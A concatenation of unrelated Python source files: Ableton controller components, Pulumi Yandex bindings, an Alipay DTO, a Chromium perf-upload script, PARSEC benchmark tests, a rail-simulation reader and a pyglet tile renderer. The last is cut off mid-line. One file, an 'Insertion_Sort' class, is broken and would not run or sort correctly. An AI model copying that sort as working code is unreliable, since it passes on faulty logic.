property_name self._display_format = display_format if view_transform is not None: self.view_transform = view_transform if graphic_transform is not None: self.graphic_transform = graphic_transform self.register_slot(subject, self._on_value_changed, property_name) self._on_value_changed() return def view_transform(self, x): return x def graphic_transform(self, x): return self.view_transform(x) def get_value_string(self): value = getattr(self._subject, self._property_name) return self._display_format % self.view_transform(value) def get_graphic_string(self): value = getattr(self._subject, self._property_name) graph = self.graphic_transform(value) return convert_value_to_graphic(graph) def _on_value_changed(self): self.update() self.notify_value_string() class ValueComponent(ValueComponentBase): """ Component to control one continuous property with a infinite touch-sensitive encoder. You can optionally give it a display and a button such that the value will be displayed while its pressed. """ shift_button = ButtonControl() encoder_factor = 1.0 def create_display_component(self, *a, **k): return ValueDisplayComponent(parent=self, property_name=self._property_name, subject=self._subject, display_format=self._display_format, view_transform=(lambda x: self.view_transform(x)), graphic_transform=(lambda x: self.graphic_transform(x)), *a, **k) def __init__(self, property_name=None, subject=None, display_format=b'%f', model_transform=None, view_transform=None, graphic_transform=None, encoder_factor=None, *a, **k): self._property_name = property_name self._subject = subject self._display_format = display_format super(ValueComponent, self).__init__(*a, **k) if model_transform is not None: self.model_transform = model_transform if view_transform is not None: self.view_transform = view_transform if graphic_transform is not None: self.graphic_transform = graphic_transform if encoder_factor is not None: self.encoder_factor = encoder_factor self._original_encoder_factor = self.encoder_factor return def model_transform(self, x): """ Tranform a value 'x' from the view domain to the domain as stored in the subject. """ return x def view_transform(self, x): """ Transform a value 'x' from the model domain to the view domain as represented to the user. """ return x def graphic_transform(self, x): """ Transform a value 'x' from the model domain to [0..1] range to be used in the slider-representation of the value. """ return self.view_transform(x) / self.encoder_factor @shift_button.pressed def shift_button(self, button): self.encoder_factor = self._original_encoder_factor / 10.0 @shift_button.released def shift_button(self, button): self.encoder_factor = self._original_encoder_factor def _on_value(self, value): super(ValueComponent, self)._on_value(value) value = self.view_transform(getattr(self._subject, self._property_name)) + value * self.encoder_factor setattr(self._subject, self._property_name, self.model_transform(value)) class ParameterValueDisplayComponent(ValueDisplayComponentBase): """ Display for values from device parameters. """ def __init__(self, device_parameter=None, *a, **k): super(ParameterValueDisplayComponent, self).__init__(*a, **k) self._on_value_changed.subject = device_parameter self._on_value_changed() def get_value_string(self): return str(self._on_value_changed.subject) def get_graphic_string(self): return convert_parameter_value_to_graphic(self._on_value_changed.subject) @listens(b'value') def _on_value_changed(self): self.update() self.notify_value_string() class ParameterValueComponent(ValueComponentBase): """ Component to control a device parameter with a infinite touch-sensitive encoder. You can optionally give it a display and a button such that the value will be displayed while its pressed. """ def create_display_component(self, *a, **k): return ParameterValueDisplayComponent(device_parameter=self._parameter_slot.parameter, *a, **k) def __init__(self, device_parameter=None, *a, **k): self._parameter_slot = ParameterSlot(device_parameter) super(ParameterValueComponent, self).__init__(*a, **k) self.register_disconnectable(self._parameter_slot) def set_encoder(self, encoder): self.encoder.set_control_element(encoder) self._parameter_slot.control = encoder
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from . import _utilities __all__ = [ 'GetComputeDiskPlacementGroupResult', 'AwaitableGetComputeDiskPlacementGroupResult', 'get_compute_disk_placement_group', 'get_compute_disk_placement_group_output', ] @pulumi.output_type class GetComputeDiskPlacementGroupResult: """ A collection of values returned by getComputeDiskPlacementGroup. """ def __init__(__self__, created_at=None, description=None, folder_id=None, group_id=None, id=None, labels=None, name=None, status=None, zone=None): if created_at and not isinstance(created_at, str): raise TypeError("Expected argument 'created_at' to be a str") pulumi.set(__self__, "created_at", created_at) if description and not isinstance(description, str): raise TypeError("Expected argument 'description' to be a str") pulumi.set(__self__, "description", description) if folder_id and not isinstance(folder_id, str): raise TypeError("Expected argument 'folder_id' to be a str") pulumi.set(__self__, "folder_id", folder_id) if group_id and not isinstance(group_id, str): raise TypeError("Expected argument 'group_id' to be a str") pulumi.set(__self__, "group_id", group_id) if id and not isinstance(id, str): raise TypeError("Expected argument 'id' to be a str") pulumi.set(__self__, "id", id) if labels and not isinstance(labels, dict): raise TypeError("Expected argument 'labels' to be a dict") pulumi.set(__self__, "labels", labels) if name and not isinstance(name, str): raise TypeError("Expected argument 'name' to be a str") pulumi.set(__self__, "name", name) if status and not isinstance(status, str): raise TypeError("Expected argument 'status' to be a str") pulumi.set(__self__, "status", status) if zone and not isinstance(zone, str): raise TypeError("Expected argument 'zone' to be a str") pulumi.set(__self__, "zone", zone) @property @pulumi.getter(name="createdAt") def created_at(self) -> str: """ The creation timestamp of the Disk Placement Group. """ return pulumi.get(self, "created_at") @property @pulumi.getter def description(self) -> Optional[str]: """ Description of the Disk Placement Group. """ return pulumi.get(self, "description") @property @pulumi.getter(name="folderId") def folder_id(self) -> str: return pulumi.get(self, "folder_id") @property @pulumi.getter(name="groupId") def group_id(self) -> str: return pulumi.get(self, "group_id") @property @pulumi.getter def id(self) -> str: """ The provider-assigned unique ID for this managed resource. """ return pulumi.get(self, "id") @property @pulumi.getter def labels(self) -> Optional[Mapping[str, str]]: """ A set of key/value label pairs assigned to the Disk Placement Group. """ return pulumi.get(self, "labels") @property @pulumi.getter def name(self) -> Optional[str]: return pulumi.get(self, "name") @property @pulumi.getter def status(self) -> str: """ Status of the Disk Placement Group. """ return pulumi.get(self, "status") @property @pulumi.getter def zone(self) -> Optional[str]: """ ID of the zone where the Disk Placement Group resides. """ return pulumi.get(self, "zone") class AwaitableGetComputeDiskPlacementGroupResult(GetComputeDiskPlacementGroupResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return GetComputeDiskPlacementGroupResult( created_at=self.created_at, description=self.description, folder_id=self.folder_id, group_id=self.group_id, id=self.id, labels=self.labels, name=self.name, status=self.status, zone=self.zone) def get_compute_disk_placement_group(description: Optional[str] = None, folder_id: Optional[str] = None, group_id: Optional[str] = None, labels: Optional[Mapping[str, str]] = None, name: Optional[str] = None, zone: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetComputeDiskPlacementGroupResult: """ Get information about a Yandex Compute Disk Placement group. For more information, see [the official documentation](https://cloud.yandex.com/docs/compute/concepts/disk#nr-disks). ## Example Usage ```python import pulumi import pulumi_yandex as yandex my_group = yandex.get_compute_disk_placement_group(group_id="some_group_id") pulumi.export("placementGroupName", my_group.name) ``` :param str description: Description of the Disk Placement Group. :param str folder_id: Folder that the resource belongs to. If value is omitted, the default provider folder is used. :param str group_id: The ID of a specific group. :param Mapping[str, str] labels: A set of key/value label pairs assigned to the Disk Placement Group. :param str name: Name of the group. :param str zone: ID of the zone where the Disk Placement Group resides. """ __args__ = dict() __args__['description'] = description __args__['folderId'] = folder_id __args__['groupId'] = group_id __args__['labels'] = labels __args__['name'] = name __args__['zone'] = zone if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('yandex:index/getComputeDiskPlacementGroup:getComputeDiskPlacementGroup', __args__, opts=opts, typ=GetComputeDiskPlacementGroupResult).value return AwaitableGetComputeDiskPlacementGroupResult( created_at=__ret__.created_at, description=__ret__.description, folder_id=__ret__.folder_id, group_id=__ret__.group_id, id=__ret__.id, labels=__ret__.labels, name=__ret__.name, status=__ret__.status, zone=__ret__.zone) @_utilities.lift_output_func(get_compute_disk_placement_group) def get_compute_disk_placement_group_output(description: Optional[pulumi.Input[Optional[str]]] = None, folder_id: Optional[pulumi.Input[Optional[str]]] = None, group_id: Optional[pulumi.Input[Optional[str]]] = None, labels: Optional[pulumi.Input[Optional[Mapping[str, str]]]] = None, name: Optional[pulumi.Input[Optional[str]]] = None, zone: Optional[pulumi.Input[Optional[str]]] = None, opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetComputeDiskPlacementGroupResult]: """ Get information about a Yandex Compute Disk Placement group. For more information, see [the official documentation](https://cloud.yandex.com/docs/compute/concepts/disk#nr-disks). ## Example Usage ```python import pulumi import pulumi_yandex as yandex my_group = yandex.get_compute_disk_placement_group(group_id="some_group_id") pulumi.export("placementGroupName", my_group.name) ``` :param str description: Description of the Disk Placement Group. :param str folder_id: Folder that the resource belongs to. If value is omitted, the default provider folder is used. :param str group_id: The ID of a specific group. :param Mapping[str, str] labels: A set of key/value label pairs assigned to the Disk Placement Group. :param str name: Name of the group. :param str zone: ID of the zone where the Disk Placement Group resides. """ ...
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class SignApproveOpenApiDTO(object): def __init__(self): self._process_ids = None self._process_type = None @property def process_ids(self): return self._process_ids @process_ids.setter def process_ids(self, value): if isinstance(value, list): self._process_ids = list() for i in value: self._process_ids.append(i) @property def process_type(self): return self._process_type @process_type.setter def process_type(self, value): self._process_type = value def to_alipay_dict(self): params = dict() if self.process_ids: if isinstance(self.process_ids, list): for i in range(0, len(self.process_ids)): element = self.process_ids[i] if hasattr(element, 'to_alipay_dict'): self.process_ids[i] = element.to_alipay_dict() if hasattr(self.process_ids, 'to_alipay_dict'): params['process_ids'] = self.process_ids.to_alipay_dict() else: params['process_ids'] = self.process_ids if self.process_type: if hasattr(self.process_type, 'to_alipay_dict'): params['process_type'] = self.process_type.to_alipay_dict() else: params['process_type'] = self.process_type return params @staticmethod def from_alipay_dict(d): if not d: return None o = SignApproveOpenApiDTO() if 'process_ids' in d: o.process_ids = d['process_ids'] if 'process_type' in d: o.process_type = d['process_type'] return o
#!/usr/bin/env vpython # Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # This file was copy-pasted over from: # //build/scripts/slave/upload_perf_dashboard_results.py # with sections copied from: # //build/scripts/slave/slave_utils.py import json import optparse import os import re import shutil import sys import tempfile import time import logging import six.moves.urllib.parse # pylint: disable=import-error from core import results_dashboard logging.basicConfig( level=logging.INFO, format='(%(levelname)s) %(asctime)s pid=%(process)d' ' %(module)s.%(funcName)s:%(lineno)d %(message)s') RESULTS_LINK_PATH = '/report?masters=%s&bots=%s&tests=%s&rev=%s' def _CommitPositionNumber(commit_pos): """Extracts the number part of a commit position. This is used to extract the number from got_revision_cp; This will be used as the value of "rev" in the data passed to results_dashboard.SendResults. """ # In case r_chromium is set to None, this logging wil help see which # commit_pos value caused it. logging.info("got_revision_cp flag has value: %s.", commit_pos) return int(re.search(r'{#(\d+)}', commit_pos).group(1)) def _GetDashboardJson(options): main_revision = _CommitPositionNumber(options.got_revision_cp) revisions = _GetPerfDashboardRevisionsWithProperties( options.got_webrtc_revision, options.got_v8_revision, options.git_revision, main_revision) reference_build = 'reference' in options.name stripped_test_name = options.name.replace('.reference', '') results = {} logging.info('Opening results file %s' % options.results_file) with open(options.results_file) as f: results = json.load(f) dashboard_json = {} if 'charts' not in results: # These are legacy results. # pylint: disable=redefined-variable-type dashboard_json = results_dashboard.MakeListOfPoints( results, options.configuration_name, stripped_test_name, options.project, options.buildbucket, options.buildername, options.buildnumber, {}, options.perf_dashboard_machine_group, revisions_dict=revisions) else: dashboard_json = results_dashboard.MakeDashboardJsonV1( results, revisions, stripped_test_name, options.configuration_name, options.project, options.buildbucket, options.buildername, options.buildnumber, {}, reference_build, perf_dashboard_machine_group=options.perf_dashboard_machine_group) return dashboard_json def _GetDashboardHistogramData(options): revisions = {} if options.got_revision_cp: revisions['--chromium_commit_positions'] = \ _CommitPositionNumber(options.got_revision_cp) if options.git_revision: revisions['--chromium_revisions'] = options.git_revision if options.got_webrtc_revision: revisions['--webrtc_revisions'] = options.got_webrtc_revision if options.got_v8_revision: revisions['--v8_revisions'] = options.got_v8_revision if options.got_angle_revision: revisions['--angle_revisions'] = options.got_angle_revision is_reference_build = 'reference' in options.name stripped_test_name = options.name.replace('.reference', '') max_bytes = 1 << 20 output_dir = tempfile.mkdtemp() try: begin_time = time.time() results_dashboard.MakeHistogramSetWithDiagnostics( histograms_file=options.results_file, test_name=stripped_test_name, bot=options.configuration_name, buildername=options.buildername, buildnumber=options.buildnumber, project=options.project, buildbucket=options.buildbucket, revisions_dict=revisions, is_reference_build=is_reference_build, perf_dashboard_machine_group=options.perf_dashboard_machine_group, output_dir=output_dir, max_bytes=max_bytes) end_time = time.time() logging.info('Duration of adding diagnostics for %s: %d seconds' % (stripped_test_name, end_time - begin_time)) # Read all batch files from output_dir. dashboard_jsons = [] for basename in os.listdir(output_dir): with open(os.path.join(output_dir, basename)) as f: dashboard_jsons.append(json.load(f)) return dashboard_jsons finally: shutil.rmtree(output_dir) def _CreateParser(): # Parse options parser = optparse.OptionParser() parser.add_option('--name') parser.add_option('--results-file') parser.add_option('--output-json-file') parser.add_option('--got-revision-cp') parser.add_option('--configuration-name') parser.add_option('--results-url') parser.add_option('--perf-dashboard-machine-group') parser.add_option('--project') parser.add_option('--buildbucket') parser.add_option('--buildername') parser.add_option('--buildnumber') parser.add_option('--got-webrtc-revision') parser.add_option('--got-v8-revision') parser.add_option('--got-angle-revision') parser.add_option('--git-revision') parser.add_option('--output-json-dashboard-url') parser.add_option('--send-as-histograms', action='store_true') return parser def main(args): parser = _CreateParser() options, extra_args = parser.parse_args(args) # Validate options. if extra_args: parser.error('Unexpected command line arguments') if not options.configuration_name or not options.results_url: parser.error('configuration_name and results_url are required.') if not options.perf_dashboard_machine_group: logging.error('Invalid perf dashboard machine group') return 1 if not options.send_as_histograms: dashboard_json = _GetDashboardJson(options) dashboard_jsons = [] if dashboard_json: dashboard_jsons.append(dashboard_json) else: dashboard_jsons = _GetDashboardHistogramData(options) # The HistogramSet might have been batched if it would be too large to # upload together. It's safe to concatenate the batches in order to write # output_json_file. # TODO(crbug.com/918208): Use a script in catapult to merge dashboard_jsons. dashboard_json = sum(dashboard_jsons, []) if options.output_json_file: json.dump(dashboard_json, options.output_json_file, indent=4, separators=(',', ': ')) if dashboard_jsons: if options.output_json_dashboard_url: # Dump dashboard url to file. dashboard_url = GetDashboardUrl(options.name, options.configuration_name, options.results_url, options.got_revision_cp, options.perf_dashboard_machine_group) with open(options.output_json_dashboard_url, 'w') as f: json.dump(dashboard_url if dashboard_url else '', f) for batch in dashboard_jsons: if not results_dashboard.SendResults( batch, options.name, options.results_url, send_as_histograms=options.send_as_histograms): return 1 else: # The upload didn't fail since there was no data to upload. logging.warning('No perf dashboard JSON was produced.') return 0 if __name__ == '__main__': sys.exit(main((sys.argv[1:]))) def GetDashboardUrl(name, configuration_name, results_url, got_revision_cp, perf_dashboard_machine_group): """Optionally writes the dashboard URL to a file and returns a link to the dashboard. """ name = name.replace('.reference', '') dashboard_url = results_url + RESULTS_LINK_PATH % ( six.moves.urllib.parse.quote(perf_dashboard_machine_group), six.moves.urllib.parse.quote(configuration_name), six.moves.urllib.parse.quote(name), _CommitPositionNumber(got_revision_cp)) return dashboard_url def _GetPerfDashboardRevisionsWithProperties( got_webrtc_revision, got_v8_revision, git_revision, main_revision, point_id=None): """Fills in the same revisions fields that process_log_utils does.""" versions = {} versions['rev'] = main_revision versions['webrtc_git'] = got_webrtc_revision versions['v8_rev'] = got_v8_revision versions['git_revision'] = git_revision versions['point_id'] = point_id # There are a lot of "bad" revisions to check for, so clean them all up here. for key in versions.keys(): if not versions[key] or versions[key] == 'undefined': del versions[key] return versions
# ATTENTION: the tests are supposed to be run inside a container! # all dependencies have to be installed before running the tests by `./entrypoint install -n benchmark_name` from .abstract_test import BuildAndRun, INPUT_PATH from .abstract_acceptance_test import Acceptance import sys import logging import unittest class TestParsec(unittest.TestCase, BuildAndRun): # tested applications benchmarks = { # benchmark name: (path, test input) 'blackscholes': ('src/parsec/blackscholes', '1 %s/parsec/blackscholes/in_4.txt prices.txt' % INPUT_PATH), 'bodytrack': ('src/parsec/bodytrack', '%s/parsec/bodytrack/sequenceB_1 4 1 4000 5 0 1' % INPUT_PATH), 'canneal': ('src/parsec/canneal', '1 15000 2000 %s/parsec/canneal/10.nets 6000' % INPUT_PATH), 'dedup': ('src/parsec/dedup', '-c -p -t 1 -i %s/parsec/dedup/test.dat -o output.dat.ddp' % INPUT_PATH), 'facesim': ('src/parsec/facesim', '-timing -threads 1 -data_dir %s/parsec/facesim/test/' % INPUT_PATH), 'ferret': ('src/parsec/ferret', '{0}/parsec/ferret/test/corel lsh {0}/parsec/ferret/test/queries 5 5 1 output.txt'.format(INPUT_PATH)), 'fluidanimate': ('src/parsec/fluidanimate', '1 500 %s/parsec/fluidanimate/in_5K.fluid out.fluid' % INPUT_PATH), 'raytrace': ('src/parsec/raytrace', '%s/parsec/raytrace/thai_statue.obj -automove -nthreads 1 -frames 20 -res 360 480' % INPUT_PATH), 'streamcluster': ('src/parsec/streamcluster', '10 20 128 1000 200 5000 none output.txt 1'), 'swaptions': ('src/parsec/swaptions', '-ns 128 -sm 100 -nt 1'), 'vips': ('src/parsec/vips', 'im_benchmark %s/parsec/vips/barbados_256x288.v output.v' % INPUT_PATH), 'x264': ('src/parsec/x264', '--quiet --qp 20 --partitions b8x8,i4x4 --ref 5 --direct auto --b-pyramid --weightb --mixed-refs --no-fast-pskip --me umh --subme 7 --analyse b8x8,i4x4 --threads 1 -o eledream.264 %s/parsec/x264/eledream_32x18_1.y4m' % INPUT_PATH), } class TestParsecAcceptance(TestParsec, Acceptance): pass if __name__ == '__main__': logging.basicConfig(stream=sys.stderr) logging.getLogger("Test").setLevel(logging.DEBUG)
# -*- coding: utf-8 -*- """ Created on Sat Apr 2 19:54:03 2016 @author: nhuynh """ import csv; import utilities; import railNetv2; import mmResultsRef; import mmRef; def readInFlowCounts(filename): """ reads in the flow counts from simulation output files of a station. ignores the second row (don't know what it is and seems irrelevant). converts the first column, which is in hh:mm:ss format, to number of \ seconds from midnight. Returns the a dictonary where key is the header of each column and value \ is a 2-column array, which comprises number of seconds from midnight (1st \ column) and flow counts (2nd column) corresponding to the header. Example: #flowCounts = readInFlowCounts('../newStation4/DefaultRun/FlowCounts.csv'); """ rawFlowCounts = []; with open(filename) as csvfile: reader = csv.reader(csvfile, delimiter=','); for row in reader: rawFlowCounts.append(row); timeStamps = []; for iRow in range(len(rawFlowCounts)): if iRow==0 or iRow==1: continue; timeStamps.append(utilities.convertTimeFormatToSecs(rawFlowCounts[iRow][0])); flowCounts = {}; nColumns = len(rawFlowCounts[0]); for iCol in range(nColumns): if iCol == 0: continue; key = rawFlowCounts[0][iCol]; counts = []; for iRow in range(len(rawFlowCounts)): if iRow==0 or iRow==1: continue; counts.append([timeStamps[iRow-2],int(rawFlowCounts[iRow][iCol])]); flowCounts[key] = counts; return flowCounts; def getBoardingPaxAtPrevStop(prevStopName,prevStopArrTime): """ reads in JourneyTimes and extracts the number of passengers in each \ boarding a train at a given stop at the given arrival time of the train. Full stop name is prevStopDetails[0]. The given arrival time is in prevStopDetails[1]. """ #prevStopName = prevStopDetails[0]; #prevStopArrTime = prevStopDetails[1]; prevStnName = railNetv2.StationPlatforms.getStationNameByStopName(prevStopName); journeyTimeFile = mmResultsRef.makeResultsPath(prevStnName) + 'JourneyTimes.csv'; rawJourneyTimes = utilities.readInCSVFile(journeyTimeFile); countSlim = 0; countFat = 0; countDefault = 0; slimFastActiv = mmRef.Profiles.slimFastActiv.name; fatSlowLazy = mmRef.Profiles.fatSlowLazy.name; default = mmRef.Profiles.DefaultProfile.name; profileCol = mmResultsRef.JourneyTimesCols.profile.value; for row in rawJourneyTimes: if isBoarding(row,prevStopName,prevStopArrTime): #print(row[mmResultsRef.JourneyTimesCols.agentID.value]); if default in row[profileCol]: countDefault = countDefault + 1; elif slimFastActiv in row[profileCol]: countSlim = countSlim + 1; elif fatSlowLazy in row[profileCol]: countFat = countFat + 1; else: pass; return [countSlim, countFat, countDefault]; #print(rawJourneyTimes[3]); def isBoarding(row,prevStopName,prevStopArrTime): outLocationCol = mmResultsRef.JourneyTimesCols.out_location.value; outTimeCol = mmResultsRef.JourneyTimesCols.out_time.value; wordSeats = mmResultsRef.JourneyTimesVocab.seats.value; wordCar = mmResultsRef.JourneyTimesVocab.car.value; wordTraindoor = mmResultsRef.JourneyTimesVocab.traindoor.value; questionMarks = mmResultsRef.JourneyTimesVocab.questionMarks.value; totalCountTime = utilities.convertTimeFormatToSecs(mmRef.ConstTimeValues.backToSeatTimeOffset.value); # counts both passengers that sucessfully get to the seats and those who # were supposed to get off the train but failed (i.e. noted by question # marks in their out location) if (wordSeats in row[outLocationCol] and prevStopName in row[outLocationCol]) or \ (wordCar in row[outLocationCol] and prevStopName in row[outLocationCol]) or\ (wordTraindoor in row[outLocationCol] and prevStopName in row[outLocationCol]) or \ (questionMarks in row[outLocationCol]): outtime = utilities.convertTimeFormatToSecs(row[outTimeCol]); if outtime>=prevStopArrTime and outtime<=prevStopArrTime+totalCountTime: return True; return False;
#!/usr/bin/env python3 class Insertion_Sort: i=0 n=0 t=0 arr=0 def __init__(self,i,n,ele,arr): self.i=i self.n=n self.arr=arr[6] self.t=t def user_input(): n= int(input("kindly enter the number of elements to be entered into the database")) for i in n: arr[i]=int(input(f"kindly enter {n} elements")) def sort(): for i in n: j=1 while(j>=i): if(arr[j]<arr[j-1]): t=arr[j] arr[j]=arr[j-1] arr[j-1]=t def display(): print("sorted array in ascending order ") for i in n: int(print(arr[i])) self = Insertion_Sort self.user_input() self.sort() self.display()
import ConfigParser import requests import json import os #Load all mutable-like information from configuration files conf_file = os.path.join(os.environ["HOME"], ".pytravisrc") gh_token = False auth_token = False if os.path.exists(conf_file): conf = ConfigParser.ConfigParser() conf.read(conf_file) #Get API endpoints try: urls = dict(conf.items('URI')) base_url = urls.get("base_url") repos_uri = base_url + urls.get("repos_uri") builds_uri = base_url + urls.get("builds_uri") log_uri = base_url + urls.get("log_uri") repos_by_owner = base_url + urls.get("repos_by_owner") auth_github = base_url + urls.get("auth_github") auth_handshake = base_url + urls.get("auth_handshake") users_uri = base_url + urls.get("users_uri") except ConfigParser.NoSectionError: raise RuntimeError("The configuration file doesn't seem to contain the \ Travis-CI URI endpoints.") try: gh_token = conf.get('Auth', 'github-token') except ConfigParser.NoSectionError: gh_token = False if gh_token: #Getting Travis-CI Authorization token post_tk = requests.post(auth_github, data={'github_token': gh_token}) if post_tk.status_code == requests.codes.NOT_FOUND: raise AttributeError("Seems to be an error with the GitHub token, please \ check that the GitHub token is correctly placed in the configuration file") auth_token = json.loads(post_tk.content) #Ensure that Travis-CI has given access to pytravis handshake = requests.get(auth_handshake) if handshake.status_code == requests.codes.NOT_FOUND: raise AttributeError("There was something wrong with Travis-CI Authentication, \ please check that your GitHub token is correctly placed in the configuration file") else: raise RuntimeError("Not configuration file found, please ensure that you have \ a ~/.pytravisrc configuration file.")
#!/bin/python3 import time import numpy as np if __name__ == '__main__': arr=np.arange(10) print(arr) t0 = time.time() arr=np.zeros([5000,5000]) t1 = time.time() arr2=[[0 for _ in range(5000)] for _ in range(5000)] t2 = time.time() print(str(t1-t0), str(t2-t1)) arr[0][0]=1 print(arr[0][0])
# TODO # # @author Oktay Acikalin <oktay.acikalin@gmail.com> # @copyright Oktay Acikalin # @license MIT (LICENSE.txt) import os import sys import ConfigParser from collections import OrderedDict from math import ceil, floor import csv from types import GeneratorType from diamond import pyglet from diamond.rect import Rect from diamond.vault import Vault from diamond.matrix import Matrix from diamond.node import Node from diamond.decorators import time from diamond.clock import Timer class DummyFrame(object): rect = [0, 0, 0, 0] class TileMatrixSector(object): # TODO REWORK!!! # we need an index of all the sprites we place in the vertex list. # then we can modify vertex lists without sparse data. # replace operation would then replace in place.. # remove operation would set the color and texture coords to 0. # set operation would search for an empty place or add a new one. # a periodic scan should remove all sparse data. perhaps user driven event? def __init__(self, vaults, batch, group, matrices, matrix_size, tile_size): super(TileMatrixSector, self).__init__() self._vaults = vaults self._tile_size = tile_size self._matrices = matrices self._matrix_size = matrix_size self._sprite_data = sprite_data = self._gather_sprite_data(matrices, vaults) self._vertex_lists = dict() self._opacity = 255 self._rgb = (255, 255, 255) self._groups = dict() self._visible = True for sheet, matrix in matrices.iteritems(): vault = vaults[sheet] texture = vault.image.get_texture() # Setup sprite group. blend_src = pyglet.gl.GL_SRC_ALPHA blend_dest = pyglet.gl.GL_ONE_MINUS_SRC_ALPHA sprite_group = pyglet.sprite.SpriteGroup(texture, blend_src, blend_dest, group) self._groups[sheet] = sprite_group tex_coords = self._gather_tex_cords(matrix, sprite_data[sheet], texture.height) # print len(tex_coords) # print len(self._flat_data) num_coords = 4 * len(matrix) # print num_coords # Setup vertex list. self._batch = batch self._vertex_lists[sheet] = self._batch.add( num_coords, pyglet.gl.GL_QUADS, sprite_group, 'v2i/dynamic', 'c4B', ('t3f', tex_coords) ) # Update color. r, g, b = self._rgb self._vertex_lists[sheet].colors[:] = [r, g, b, int(self._opacity)] * 4 * len(matrix) # print self._vertex_list # Setup position. self._x = 0 self._y = 0 self._rect = Rect( self._x, self._y, matrix_size[0] * tile_size[0], matrix_size[1] * tile_size[1], ) self._update_position() def __del__(self): # print('TileMatrixSector.__del__(%s)' % self) for vertex_list in self._vertex_lists.itervalues(): if vertex_list is not None: vertex_list.delete() def _gather_sprite_data(self, matrices, vaults): sprite_data = dict() for sheet, matrix in matrices.iteritems(): vault = vaults[sheet] result = dict() ids = set(matrix.values()) ids.discard(-1) for id in ids: result[id] = vault.get_sprite(str(id)).get_action('none').get_frames() result[-1] = [DummyFrame()] sprite_data[sheet] = result return sprite_data def _gather_tex_cords(self, matrix, sprite_data, texture_height): coords = [] for pos, id in matrix.iteritems(): frame = sprite_data[id][0] # TODO for now just take the first frame. # print pos, id, frame x, y, w, h = frame.rect # print frame.rect # Flip our y coord. TODO can't we do this somehow else? y = texture_height - y - h # bottom-left, bottom-right, top-right and top-left tex_coord = ( x, y + h, 0., # bottom left x + w, y + h, 0., # bottom right x + w, y, 0., # top right x, y, 0., # top left ) # print tex_coord coords.extend(tex_coord) return coords # @time def _update_position(self): x, y = self._x, self._y w, h = self._tile_size self._rect.x = x self._rect.y = y sprite_data = self._sprite_data if self._visible: for sheet, matrix in self._matrices.iteritems(): vertices = [] sprites = sprite_data[sheet] for pos, id in matrix.iteritems(): # print frame s_w, s_h = sprites[id][0].rect[2:] x1 = int(x) + pos[0] * w y1 = int(y) + pos[1] * h x2 = x1 + s_w y2 = y1 + s_h vertices.extend([x1, y1, x2, y1, x2, y2, x1, y2]) self._vertex_lists[sheet].vertices[:] = vertices else: for sheet, matrix in self._matrices.iteritems(): vertices = [] sprites = sprite_data[sheet] for pos, id in matrix.iteritems(): # print frame vertices.extend([0, 0, 0, 0, 0, 0, 0, 0]) self._vertex_lists[sheet].vertices[:] = vertices def _set_x(self, x): if x != self._x: self._x = x self._update_position() x = property(lambda self: self._x, _set_x) def _set_y(self, y): if y != self._y: self._y = y self._update_position() y = property(lambda self: self._y, _set_y) def set_position(self, x, y): self._x, self._y = x, y self._update_position() position = property(lambda self: (self._x, self._y), lambda self, pos: self.set_position(*pos)) rect = property(lambda self: self._rect) # @time def _set_visible(self, visible): if self._visible != visible: self._visible = visible self._update_position() visible = property(lambda self: self._visible, _set_visible) @time def set_tile(self, x, y, id): s_x, s_y, s_w = x, y, self._matrix_size[0] sheet, id = id.split('/') sprite_data = self._sprite_data[sheet] vault = self._vaults[sheet] if id not in sprite_data: sprite_data[id] = vault.get_sprite(str(id)).get_action('none').get_frames() frame = sprite_data[id][0] # TODO for now just take the first frame. # print frame x, y, w, h = frame.rect # print frame.rect # bottom-left, bottom-right, top-right and top-left tex_coord = [ x, y + h, 0., # bottom left x + w, y + h, 0., # bottom right x + w, y, 0., # top right x, y, 0., # top left ] # print 1, tex_coord # print 2, s_x, s_y, s_w pos = (s_w * s_y * 12 + s_x * 12) # print 3, len(self._vertex_list.tex_coords), pos vertex_list = self._vertex_lists[sheet] tex_coords = vertex_list.tex_coords tex_coords = tex_coords[:pos] + tex_coord + tex_coords[pos + 12:] # print 4, len(tex_coords) vertex_list.tex_coords[:] = tex_coords class TileMatrixLayer(Node): def __init__(self, suborder_id, vaults): super(TileMatrixLayer, self).__init__() # print 'TileMatrixLayer.__init__', self, suborder_id self.order_id = suborder_id self._vaults = vaults self._sectors = dict() # def _set_suborder_id(self, id): # self._suborder_id = id # # TODO Update group id of this node by placing id after the comma of the node. # suborder_id = property(lambda self: self._suborder_id, _set_suborder_id) def has_sector(self, id): return id in self._sectors # @time def add_sector(self, id, x, y, matrices, matrix_size, tile_size): batch = self.window._batch group = self._group # for sheet, matrix in matrices.iteritems(): # print 'sheet', sheet, matrix # print 'sector real pos =', self._x_real, self._y_real sector = TileMatrixSector(self._vaults, batch, group, matrices, matrix_size, tile_size) sector.visible = self._inherited_visibility # sector.set_position(self._x_real + x, self._y_real + y) sector.set_position(x, y) self._sectors[id] = (x, y, sector) # @time def remove_sector(self, id): del self._sectors[id] def _set_visible(self, visible): super(TileMatrixLayer, self)._set_visible(visible) for x, y, sector in self._sectors.itervalues(): sector.visible = self._inherited_visibility # @time # def _update_real_position(self): # super(TileMatrixLayer, self)._update_real_position() # # print len(self._sectors) # for x, y, sector in self._sectors.itervalues(): # # print x, y, sector # old_pos = sector.position # # new_pos = self._x_real + x, self._y_real + y # new_pos = x, y # if new_pos != old_pos: # sector.set_position(*new_pos) class TileMatrix(Node): def __init__(self): super(TileMatrix, self).__init__() self.__config = ConfigParser.ConfigParser() self.__vaults = dict() self.__default_sheet = None self.__tile_size = 32, 32 # Never go less than 4x4 or doom awaits you! self.__sector_size = 10, 10 # Default for visual sectors. self.__matrix = Matrix() # For debugging. DISABLE ME! # self.__matrix.set_default_value({0: '72'}) self.__layers = dict() self.__layer_config = dict() self.__last_map_pos = (None, None), (None, None) self.__last_matrix_rect = None def add_sheet(self, sheet_vault, alias=None): if not self.__vaults: self.__tile_size = 